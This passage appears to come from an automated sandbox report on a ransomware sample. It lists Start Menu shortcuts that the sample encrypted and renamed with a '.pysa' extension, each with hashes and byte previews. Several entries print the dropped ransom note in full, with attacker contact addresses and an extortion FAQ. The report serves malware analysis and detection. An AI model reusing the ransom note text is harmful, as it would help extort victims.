                  Preview: l..N$3. R2.....$......h\.........&.^...@?.F..".Y....q4....O9....F63..u?...;....`d..#bg...../....%=.^...M.Z...rEA..)DE...k.1.7...i..i..T.Zc..P......P.....<.h......../.3.d/.......%.......o..bF.T-N.k.<._..=*Q.....J..`.E...N..l%......6K.7.u..0"=.N.....8.hiS.....ad8ww.'q.....*#.d....r.9.7.E.6a..y.T.......$...4..y.V.R&.q.;Y..AN..b.\..~I..g..:w.9..i.=%+.....M.'..|.=.4.wx.}NO;......e.Rj..Y..+.s..T.......~8^.;......W.$..,..pG.@.....3:2.....jE......!.Q.m.....X.....i....4.J.t....|U.K..c.P.H/..\u.Q..8.....lP&.....u.....$.Ff....0..C)b................\su.,9.jWD..f...r....ZXo..E...)Fx.....KrU......|....'..k..jO.....*.}d1..^7..-.R....?..b...6........D.....Dt..................aB$d.7.m_!.....D..Tz(".Uj..R#..B..#&r..B...s@.]......6...v...r..>.#B..p..j..ijb`......^..U.A.{.8.o#Ms.......)b.w..k.._WF.n...>'.".l(..:.l.....U....O.`b|.*...df..&.k..d.%X...R...`z.......^../.........Sw......S..+m....^.&'w7....t&m.....N..94.a..=x...`.........O...MU.}._.g......w.1LD.A..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.778028863234764
                  Encrypted:false
                  SSDEEP:96:zZ5b5pq9dhYOe78kuqXcXshXj4Nt3vuFdppKTS/c4XpO:7b5Idhy7JuvXshT432FbQTTeO
                  MD5:80E0F38A5F4DE7A7D508349308A17C8C
                  SHA1:9605102DD08F4800612E20AB880F1556418C683A
                  SHA-256:8473E17A528CCA2C739E601A7C20C67FA3F3370004AE37AF62DFB38CF25136E2
                  SHA-512:A03CE162FAF9B58773C67223059F9F768B8034CFEBDCFEFA8C1ABB5AE2BE5DA009EC2359C3C3BD66331B8030ACE528546904F8B15F77FA25F4561D4400000836
                  Malicious:false
                  Preview: .+.Q.U.@......<-..o...4.y.O..#H(EOt.v.u\$....!bB.b.r. ..BG2...E}N.kb..n...6...|T.y=..`........<...~.43.?}Z..l.}...w.:...6.....p.+.}\\...n+bdnZ`.-8...L_..#..k...%......p=...........*V........n..Wm.."..;m..LuR....\h|..v.L.OZ...b.to.#..\..........!..s..H...%Am...IY.B.......a.H'..O,q..g.w..9..u..&.....:21......p.....H....YF..P....2..`.).n...R.r.v..l2I..1H.WR..[[(!.>hU.#....p...Q5T7.......f.[....%d.CAs..Mn.......^...#`.T.~.z..|i.F..u..P.. 5.2...;....9o6.x.k...W...2.T(.c....O.%......Z%....uc./.....V._*...j)..,. ..cMK..h...un.'..f..n.r...R.....E..U.1"..'|'...Z....c.xm......L.m....QI]..\..7Z.b}(..."...P....HRe..j..e..Y....X/.Z...W5...9..ef3$Hd..<.Wx5q.s ......R7}..}..Bg6.V[.t<....!1.@z.[.....#.9..p..k"..k....Z...})..,..S8*8IV.....M!.....njW..o......2".... .=;..K....M...Io...A..$.!S.s.z-...|~|.......MK..p..].....D,.p.zdx9../d.Q...>.$..[.....X...\..|..tI..a...Dz9.P..ZbS.H.C.........P..N..54"[.|H.R....w...&..c...N....[.........!.....5+ .#+.M.C.br
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.7727988988783405
                  Encrypted:false
                  SSDEEP:96:3ugKkGMiZCuv+PfX64andk9EjitPzY+6DKtPkn0hHtk:nKUiZaP64sKEjidj6Dcti
                  MD5:DE13D6EE093A377A55DE7DF66A572FA1
                  SHA1:F0F116179972C1DD283821D54451AD0F25707FA4
                  SHA-256:FB4C2F7461BE3359DDE5F7963867218ACC27B8F789EBE284B13FF01CBC3DEFF5
                  SHA-512:EC25233CBAACC89491428A0FF0214185438768A510A5AE0DA09B1A9FD77072431602EFE225818F922C6D43FB77393A5AB06A6BB4FB84ED4DE082F3B89BEED57D
                  Malicious:false
                  Preview: ..5.......uGv.a.f.g......F.....E....6T.:7.UST.....u.'.3....r.p./=n..FJ...0.&.u|...f..R.../rF'.c.$....27.".)8s..u.........o..zJ..O..5Lrp2.:..,-#.p64r.1...".U.^..=Yet7..U..`.{(k.Hs..q....V}.i.....]...\....W.LB$.G.y....cN..~....$gW....6..}^bp.....y.MN#.......^..>..[cRK.<-..%}SUAy./.A......Z.8T..G......M.I...}...y$..P.%t..(.......$~.^..l1.A.ar.....L.....\.u.....-F.8.S..X.4.83.....t........~.j...r..)..W}.."..5!ZB......p:.A..g..>".n.~.1.r...2=%7..I.U.7.G....eo*..'e..n.......s.n..d.Jm./...7'... W.n.,.8....5Q,..mhW.F,......S;Iw.C.'.T...E..`..L.,.V.$v.........En.;.<*F.....g5...u..Y.....f..t.Z...QN...qa.:.'...:..bv.L.FU.]=}.}}+..E...\?Q...c).......e.X..! .t.y.7=.Kj.YJ.R|..7fQ...Y...p....wL....0.N..........d!r%.CT...'z.Y.....EH.V. .gA9..d.Q..Fu..$..\......{.Cx.3..A.)i.M...G...S..u...Y..@..W|.t."..Z....#cz.?..{J.oe......6H~.$hn.s.m[..".%uO..-o...4......Y..?''P.B......%..4.*.Z8....db...".&a.@.sKG.C.-v.....l.;m...m.Cf)u..S.....C......H.O&....%.?..e.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.770737338824047
                  Encrypted:false
                  SSDEEP:96:RN9aEvpNwiihxcejVtAIA5RBQSVBhUFnisQNgpSU1AFrgJEw:X9aExNwFCejTRYBMQypSuApgJJ
                  MD5:085B6EDA9299FBBE69B020F06A449325
                  SHA1:063C674E0F7FF553B1D1F63B615BFC4B3F63C8B8
                  SHA-256:6FCB4B4B5878D036928BAC0F319FDC49925EA198CA90BD30B1BFBA995962C09A
                  SHA-512:E59734049F6082ADD11E6E023292231CA8DA31F0FB73D29D71C70398258E274F93422524B1886F098D40B084BAE306EAE693DA61D64C88A033BCD88ACF517C55
                  Malicious:false
                  Preview: ...,".....!.B./Xi.|.i.C..5,...I.Q.3...6...N..A.v.!.M.,M.IP4y*HA..}-...nx6.+...M)gp0.v..$...m....o>...U-#.R...U..Lf.UP@pl.6........aDS..tH......zs.z.-.c.U...,...I..9..".=.....2."`.u.I.S.X.j+..xx.Z...z..e...>..t..g."K.>..*..2....4..G....&..N.J..Kl........&.X@^....CS.%.?s.s.\|..8...9Y..>.5.YH./.(w@.^.G.......W...1.o@h........AY..,./.+r...4e.C.G....N.....~h\.........4..il`..s.....RC......'%..*...k$...8.......D>KT.......%Q$.o....D....;..[1.!./=.....a..Boz.LC...R7.4... U..{.J.{.%.Z.E..}7......;.{}W..~./B8&RD.a].Z|..u...NU.X.tZ.B1.<UmM=... ...-.qEv._...G......AD.T....R.g....@.Z6-I}..kK...Fy\......\s..)g..x.z...M.....?.CK...e......C...c.w.;.'...j.J>.#.....J...F.......Wr..........Z.r...._.F...$.7i....-.....]..l...S2..>....gQ.=.^4.)W\.p)..'....Q..z...w.u{...+9.H/..C.Q...5%..N.~8.<\..tj.3< S.....Lc..0..0..+.*.C..U?..Dl...E0..\s.S..)7O.%..4...VQ...R..:.%.D..K{..M..k.......r..S..;?....pc.....q....@.>....w.v.\.d.?.T...g....^3._...(...u..Qa.e.....S
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Configure Java.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.760180905289734
                  Encrypted:false
                  SSDEEP:96:Uai7dsExCZNvpJ8dafQ1rLZVg80sSreozx:FvZNUd0Q5g8nozx
                  MD5:121B93E5E9408B9030727CEE8BB5B7F2
                  SHA1:4A9696D0D628BF3CD2281262410CED369A473B35
                  SHA-256:D83A1A160BF6ED005FDC7625D6D482CBFB8752EB947B39697CDF7E10015D9F45
                  SHA-512:BA868B081F2AA6DF2161D97D40A11F767BEB57B98DA03BBECB6B0CAAD679EEEA33228A17B4A06AC07C9081E56763BE6496D965D50D9E71B0FD0D6A8024E796F0
                  Malicious:false
                  Preview: .b..0vV...VF.\Ui+../..aD.K..Cf ...o..z..#.p1.1=..T=?.$....$.m..#>.@.r.a.\. 6......x..Ek.....O....k..=5..Flbpe....N.3u.....Z........*`...G.0.........10.?.(x..,.....6<.........Ta...A.qE5....'.,...`5.Q).X....a..={Ul..6E..4......8G.i .....M..&.Pl.......4....[......T.3......y.=.E.../.s..v.w[&\.......vxm.I.. .c..R<..s._.....XN.zb...<.....i........*....[....@...\x276..wp.M..0..]..*..j.6. $5.+.CXw.a..0......=N....hT{._Y...:U..F+..=T..#l..V.5..C....BE..+..J...b.0i7..(o..Z.Y.#..>.x.I.=............?'.E...5...S<.>F]..u...$.6.;W.......a#&..{.4....&Kh*1.B#.x...s.v., ....p...]r.0t.....(...P)c&G.@>.?...Jj....60...O....%.............1..5...?.;..QF..S?u.5...t+..Z;.x...JohO....F.1..B}...?x'n.'.......AW.u..zGp....1i...<a}]...Q5x43....4...50.QO97.G..z..*Dy_~..U...IV%.....c..(...........0p*...~.+.5..r.EV '..v#.`.....2..........%.....k."1.H...c...CI...jI....}..5R&.d.O......+...reI;...u.`<..O,..I...:$]..&.t8......I.4.h..MT.~.....x3..".u7U.......M......q...8.M..S.!
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.767453327328174
                  Encrypted:false
                  SSDEEP:96:0liC5RCl30owZSNIxMnFddZE14vWxX0lj2eLzEt23n:0R5s1lwm2qF3ZxJlj2MzEtu
                  MD5:67BA5DC97F431CC8F53BA54CF38F724F
                  SHA1:17483B44ACB384D58707600306D138947F587DD8
                  SHA-256:80CDD30C296321F91BFE8BC5D5555AE0A8838E6AAB1B8C6FB4B21EC4D2BA96C1
                  SHA-512:1ED14048924CC848F43A0714F693417A34B5E4CCF952B16CF3B82E65D119DE9BBBC3117ACB2EA89D1728CE644D6CBAA95B3CED950E081C835EDB5369D42FD152
                  Malicious:false
                  Preview: .s..#.M........^>.Z-(..x..LW... .#..*l.......>i..%=...>f+3..;..{!..;I.....].7..F?..I.. 7[..1.< A.y%.C&...F.......e..7]".p.<N._.~..k.'........@.4....~.7Z]...8..S.3y.%.P...e.n.N...q..5*.lh.....D.O...|...Z..K.[....2..R..B6.^..Dw.D4..\..m.{.D.&....I..d.. ..\/5ZJ...ji{O.fQ...(..R..N....q...?MO4.@Bb...vE....D.<..W.#.......*.d.bbb..y..RM.%z...KtO..o*#*.<..u@.g..8.(.i.f../K[...k.y@Y\L....g...u...C.z.A.F.....a.....!d..r=.....Y.eh.A4..@;.....X................M...$0?z?.A..Y..\..X.....+.4QL............#].z."-...f...#P..E.....y?8^/.<f..0q...S<.\9....bv.4.a../......`....lI.$2P~^......a9....Q..w....!=l....C}..Go.w[..J......F-...X,.L.9..0,h.>..=..f.<2..5.A...o...|.U...$..qXg...&g_..q...}F...y.syJ.X..NmG.i.f..b.H.'l"..A:....lH...L.k)..O.9@h.....F..$..kg..R,@...q...<.9(hr..'d....).t.gM.@.=r..!."Y5f..cZ...a.<..,...IA5)}3..j....[#m.6......'...H..0-.........2Z..*..>...Q.2...`.........gl.....h..?D....:I.0mW.<Gb.._f...O.B.M`|V..d......\B.....0l....Q.....y..!
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.7845115763797965
                  Encrypted:false
                  SSDEEP:96:UKNvR4dMMU61df0BmAuMF3/cZVkJr2wVebBZdf+7qmtfeS:RGMNAJMF0UJr2wk+umhn
                  MD5:E70028FADCE0F5E7FCF97CA1C1245A04
                  SHA1:9186C599222E7DBD79E8E99948D687F4A94B1C9B
                  SHA-256:BC5D141B1C1AF2DEA3424025ED3AD4058E16BD94DC49724AD61DD4F2B1C5668C
                  SHA-512:32FB7B24D8256BE4774AD706520BD2C4780FA6E62EE0FC1C9B314C236CD1530E19B33A2F90C18BE20812F05B14DA27667081FDF298ECC6F4A4DF36EAC6E82203
                  Malicious:false
                  Preview: ..}....k.,"..m.....4.l.h..I.x_.i....`._^.0.~..L..9f.5...F...4..B3J.u..;..>.....A..9p..%cl..d9?K..8\.E...b.2...E.V...?ZG..Kn..Zt.n3...(...Y.q...kF.....k.....e..29...n|~..F...W....[I.......^VH..pD.L..S....(.d.)].S....S..z'.o|./.Q.....n.A.K%&....C...R:....P.0@3..U.....0....y......."....?...;Q...'...;...5B..}~Mp.R...T..'.6.\.L.v4.}X'.~.=^..I.nH...w....;.H...v$.(........m..J...wB..._C(.=.Y.b.e..<.{x...b..?.y..l,3..v.L`.B...Gm...t.L.z.....@....,.e*.dDj..6......H...L...s..y........(....).u...~.)..s.Z...@.c<..../...>~..ha.+GZ..a. +...GT..Z..]...P.*.......&...d........<.m.D}u.4.v.C(.<.ST.T,E.?d.m*;G...1.:....5,.* &?.......V.....^p.......\1usG.`.#1$..!-.2.. .O.!M.B/....{.W..3...7............wD........-.....D5.....~...k...d..|@.....wN..hj.u.......UC..z1n.P8...].e/o..:.L...\.....wR.b.PE.d..7..~...G..O..P.X..4.S..k.4.U;..P.E.1.)..b{.-&..c.,q.W.!~...e../!..2....K[.*.H.]`....I.V....H.....[.:.Q.e...VN...%.O...C....#+...E.k..U..3....$@....t.P..6.....T.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.787238817250694
                  Encrypted:false
                  SSDEEP:96:a/f/LAqczwMeD1U5lv/WcgdvD+Zpm51WwnBCSlN8:anTAqMwMeEvu1Ipm5nnBBN8
                  MD5:3C3E8B374532A4273169CE813E44EFAC
                  SHA1:6EA6E7AA186362EB42B8E600D29C30B1ABBC9AEA
                  SHA-256:A36EF2402CAD711524B5886D41310D5E50BA7D3707DA068C39A2E445B588E2C2
                  SHA-512:2A39C8A6A6245AA92D5063F66B43919688BDC5CBB4ABC712D79FFED924FD1D33CC95485AB665951371F1D89CBADFE911C94CF855EEE252B12D68E78E8E4CD432
                  Malicious:false
                  Preview: E........#....eO.......+.N..b\F.\..N?0.V...vdPP.R8j.~A.<O.6.L.....o.)H.=...y.Q.wv\.N.4.\.P...Y..Zc...dW~..s....#......J...H.L..W....}.=/2_.H.B..b..!.8)9`...q..}@..I...A....'./....y.O.LU.#us.+)&H[.tF.......@....n.'..%.L.|... Q{.....'......T....V...I.A%'l9..wGQ...=M.. .F@.,.4.<ha*.7....,...@}.W..^....$g..........."..oy j..D8'.PtXf=.X(w^Xv6..C.!.d_.<..........x.Sf.<...b.!H#.[jF....fo....~.(...%.q.F.."9foEG).g.hv%...2".g..x..j..cX....&p...7.*..!..0m$..._...V.sqe@...u5@..|..>..... .M....F..d..h..Z9....n...b..z..#..?..e{....w..v.iW7\...15E..N....r..p..I`..@...k0.~..YV..._. n.0>...]...A......[:.....me.......{?.....{.B.CL..X2.....,..3.j...dQ...2.wE.... . ^E5Q..iH[.._.=.. Q..)H.<.w-Q.5.?<3q.$.w..S!..PnM...v....@..P..4.....w..x.q..0&E....W5.,...].).........<X..C..K.j....?....L.lQ...#.M..vM..;..`.M../4CL-.'.}..=./W....<.T.>x..b3....B....V.)}-.@q&.....T+..}.w.*.T...D4..E.c.h.....i "......&....5o.....v..s.....b.Y.Y}.i.k.>x...F..5...(..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.761338834694348
                  Encrypted:false
                  SSDEEP:96:8urVXSVuu/3PpSYlfr0lzdoJRlEZ3iYW5PWKNbZ8/w3UM1rwLFheT:8Ggh/3haLMHEZfW5OKNIBMAheT
                  MD5:CFF48549756B64B626D6EEBA3829C937
                  SHA1:56C66F47B22D47F53FE8A10313B647DF3748033E
                  SHA-256:A8EF06A2F9EC6FD5BC2B31B8A4E7B6A88CFAAADA340A1BB8B393656ED5A8809E
                  SHA-512:1B1EEBAAA19B87DCA86F37D482C8141461169499384699AD677A974D87945B461232FC345ADA369484C30DC1E3B4883DB82E1173CE55AA8D216E94C1DEE78BAA
                  Malicious:false
                  Preview: ...7.......>C..@.O._CT."...l....L..hmQ..sgO).......j.{...&......3.,..@/.,.{..W.I3.......u....E.Q.&bYH...&....hG.8.J.E...w....vhQ..aw..[....`......;$K.G...P,...j.........x.../.Dt<.[T..w.V..I.H 8.i...j/{.|.h...-^.Gm..$.R..p.<5....B;*(..,..nS=..k..Io...D..g8......R..Dy...&..K......o...z.....7.....S58`......"*..z..[../6.[...7....E.6LH.r..kO...J7`En]my..1..i.Q.%.E.....:+R).Sl.........e`.h.+.y....F..8A..\bLAtk.Vg.c... .1D.T$`..Di.....#...Y.2.(...H.3I..j.Y@.K79..p.K.se?p..2..z2.E9..I.'...r.N..?..@..4hsa.....U.m...y....\..=..q..F..3Vga.%\Tu,K.|WQ.CE...W.....<-..?b...I.$..l.PZ}..._. D..I...T..fT.c9e...\..'T...........8BX......C..o.-...;.\....._3.`I.d..`f9y.(..h..q..F&..AU.....}.~x0...('x...m.O...Cq.?....R.V..?.;g..$...h.p.z.pQ.T$...+.^Y3..FY.........i..r.(..8.....S........g......A`...0.H....|..L.2.O,.8..U=.m......T.....v....fS.I.....|w?.........x..........*..D.2.X_.b....{..LXv...$........;............6.CcD..R#P.P.... v....V.E.?......r
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.783132220636022
                  Encrypted:false
                  SSDEEP:96:5BTAxFpuyvu0qDy+GjoR/V7hdch8Bzt2M:rAxbuxyt+/x/Y8fH
                  MD5:CAE228CCC1ABD54F9E7566FD98CF29CC
                  SHA1:657462FA2C856583E7A0059E7298D64689476AA5
                  SHA-256:E4EA8BD9AD5B43507AEF8F13DDCFAC3CC55DC3756D3B2EED58CF60B9F0E537E9
                  SHA-512:B27E8D43ED374DB8D676EEBFFDD0DD7A0CBAF1F8C875961AEDD5313A94C4EBA93B5FE116CD76ABB1AE6C4502E8C4A4844887430CDB1EFDBAB3227BE93ED9B2E3
                  Malicious:false
                  Preview: .....r5.s.....B:....2^G~&.=...x..v.l#....iD/......k..n..H.`Q..1.%:5D..&Y.a.Z.B7.3..~...w."I...d.P..V.C.{\~...?..s...F.+i....>.)O.w..N..n..A..%..>..k.D.1} ...(V..Z......f.@j..)'RpW&.v.D...>...#...v..?BS.....k..p.$W.H....x>.`pp..Uw..8......[#....u.t..+../G_...,K$\.j..B.O.....py....7....9.K.NXB.|...X..D. ......L..........G.......!.7|.6-o.G.0. ...Hm...j.....E..:.....q.>..a...D...../.4....g...P+.0z/..S....7..Cq=..4._.mP."sN..]..W.....^.$c.. ....v...>..M.`....1&.....[10!.qN..Mg......c.d........`5...[^..}..b.7...pH....#......u......5...5.C5(..eT..9.y..X..g..c.e..)C0..i.....]...Z#!.p.n...[...iu/.|L..$.C[.../.:=.../.U..q)......f.........Hw......._..O5...49/M.}4t....... ../3 .4..(N....'O.pZ.I.e...\........;.'.+.cr.Ge...S...H.S.Bdn.S.x5......FU......6.k.....Gi."....H.m..J..."l..25.c'd..ae...)..W.1C.]..l...@vz........F.v..a.IDo.6.v*ue:.n.A....2........{J.......D.od....b,.lvQV...Y.d..../4...[`...k.....dW._j.%'.]...{&..V.3..z..Z..e.lN}....y.|.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.759120556301159
                  Encrypted:false
                  SSDEEP:96:Q/ULDjQocbYc0SS2UItbKYv9zgvWfVJr2jNAmif8naFGkGD/:DL3uYjSS2HbKczhzr2jC8nA07
                  MD5:E872D79E905144AEC13EB6B98FD4E88D
                  SHA1:81D306D032F2235154DE5C006ADD689D171C3954
                  SHA-256:7D9F1D42582F21947EB165524958E52E9C14C0AA2C6F7A4B8A804CFAFBE568A4
                  SHA-512:0BB1B50339C24F182CD5F9EDD9D5DA83C35D15AEB1B444509994782D8E14BFA06861252EBF992D970D6D4085BF6D1FD4B711C622A947151E2FE8BDC2136C4171
                  Malicious:false
                  Preview: .7...)..pq@X.x8..$....M..*.2*6p.F.+.F..c.....W...{.t.q.l....'.X.............7.B,..H..@..Q......~...^..[oF\cZ....R...S{w..."/....k......n.d...o.j.p.........Hv.t.e.[..S6...f3.0K....:^.$.9.+tQ....X....8......3..Bc.&?..".|...Q..].....-A.5....:6..4B.Z.....b..]..Q.+.r.e.FW.?e...|....K.T.g-.|Y#....{.u..*y....Jp.(.d. 2...O.R#... .s....e.;2...6..:.6.U.c\i.0.m.8B|..6\..j.....XW. ......... .U.rc.....=.Q.@.`..$.%...mJ.U.......%..q....MAvK..G.:,Z..B.....=.N......z#...q....z..V.I....,...#..[.A.....<*.[L.?'.{i......M.s....H..g7.Q..8._...!...0.BXHD...._.b..,.i..a...z.X.m7..L't.Z|>Lh....WS..b.....h./_JBq..Q.F.>..d&.)*f*|..........='.....=r9,V..<.Y...EP!r.N.._*.us...1\k..%.0.59*..qZL..[..z.=\.~.+[..+.B.iOA.`..Z.;..xO..?.j...qX...@....`._.j.gZ..K..o......0br"..Z,..=g.....t......*...F=..4.t..#<.A.DFZ.6.V..E6.IR../........r|K^+.DRdf.2.D..4....7..S...t......akU..%<. ?.[+.............<.3e...l..67*X...^3a%.db...P..,~.F.2.=.k..b3.M.V.t...Q9.@|.....c1....m.0.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
